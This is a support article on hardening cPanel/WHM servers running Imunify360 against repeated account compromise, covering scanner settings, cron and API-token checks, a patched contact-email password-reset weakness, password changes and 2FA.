Issue
Malware Remedy Team investigations point to the likelihood of accounts being compromised.
Environment
- cPanel/WHM
- Imunify360
- Supported OS
Solution
The following guide will provide recommendations to tighten the security stance while cPanel and Imunify360 are used. In case your server with cPanel is reinfected quite often, we suggest doing the following:
1) In case you are using Imunify360, we suggest the following features keep as enabled:
- Set a "Kill" mode for the Proactive Defence feature;
- Enable real-time scanning options in Imunify360
- It is important to make sure WAF layer is fully functional.
- Make sure Malware Database Scanner is active
- Make sure cron task scanner is enabled
- Enable cPanel compromised accounts protection
- Enable cPanel upload scanner
2) Check periodically scheduled jobs (cron jobs) for root as well.
3) Check that cPanel API tokens are ones which you know about:
4) Update WHM as one of the possible ways to gain access is via email file access:
If the "password recovery" function is enabled on the server, then there is also a possibility that the attacker can use his email address via the email files
/home/user/.contactemail
and
/home/user/.cpanel/contactinfo
in order to receive a password reset link to one's email.
We suggest checking the mentioned files and removing the untrusted emails.
With the latest changes on the cPanel side, this method is no longer relevant. Those files are no longer used, although they can be present, but the system no longer uses them.
All contact emails are now in the `/var/cpanel/users/$username` file. This was done for security purposes. Now hackers who gain access can no longer change the `.contactemail` file and request a password reset be sent to them. These changes were made to WHM, starting from the 106 version:
https://docs.cpanel.net/changelogs/106-change-log/
5) Change a password for the root and for compromised accounts:
- Home » Account Information » List Accounts
Select your cPanel account, and next to the account, you can drop down settings with "+", from there, you see the option to "Change Password" and you can input your new password.
If it was recommended to change WHM passwords for the affected accounts, yet required to wait until a customer changes it, the password change date can check this with:
change -l $user | grep 'Last password change'
6) Enable 2FA for cPanel users as per the article:
Comments
0 comments
Please sign in to leave a comment.